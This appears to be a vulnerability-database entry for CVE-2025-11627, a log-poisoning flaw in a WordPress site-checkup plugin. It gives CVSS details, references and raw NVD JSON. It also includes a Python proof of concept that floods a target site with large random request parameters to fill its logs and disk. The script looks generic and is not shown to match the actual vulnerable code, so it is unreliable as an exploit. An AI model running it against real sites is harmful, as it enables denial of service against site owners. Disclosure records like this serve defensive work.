Security Vulnerability Report
CVE-2025-11627 CVSS 6.5 MEDIUM

CVE-2025-11627

Published: 2025-10-30 06:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Site Checkup Debug AI Troubleshooting with Wizard and Tips for Each Issue plugin for WordPress is vulnerable to log file poisoning in all versions up to, and including, 1.47. This makes it possible for unauthenticated attackers to insert arbitrary content into log files, and potentially cause denial of service via disk space exhaustion.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Weakness
CWE-117 (Improper Output Neutralization for Logs)

Configurations (Affected Products)

No configuration data available.

Affected product: Site Checkup Debug AI Plugin < 1.48

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import random
import string

target_url = "http://target-wordpress-site.com"
plugin_path = "/wp-content/plugins/site-checkup/"

# Generate random content to poison log file
def generate_payload(size=10000):
    return ''.join(random.choices(string.ascii_letters + string.digits, k=size))

# Send malicious requests to trigger log poisoning
for i in range(100):
    payload = generate_payload()
    params = {
        'error_test': payload,
        'debug': '1'
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f"Request {i+1}: Status {response.status_code}")
    except Exception as e:
        print(f"Request {i+1} failed: {e}")

print("Log poisoning attack completed. Check log file size.")
```

References

https://plugins.trac.wordpress.org/browser/site-checkup/tags/1.47/includes/catch-errors/class_bill_catch_errors.php#L80 (affected source, version 1.47)
https://plugins.trac.wordpress.org/changeset/3380169/ (plugin changeset 3380169)
https://www.wordfence.com/threat-intel/vulnerabilities/id/50251b17-58d7-4870-b825-a194312fb3e7?source=cve (Wordfence advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11627",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-30T06:15:43.757",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Site Checkup Debug AI Troubleshooting with Wizard and Tips for Each Issue plugin for WordPress is vulnerable to log file poisoning in all versions up to, and including, 1.47. This makes it possible for unauthenticated attackers to insert arbitrary content into log files, and potentially cause denial of service via disk space exhaustion."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-117"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/site-checkup/tags/1.47/includes/catch-errors/class_bill_catch_errors.php#L80",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3380169/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/50251b17-58d7-4870-b825-a194312fb3e7?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```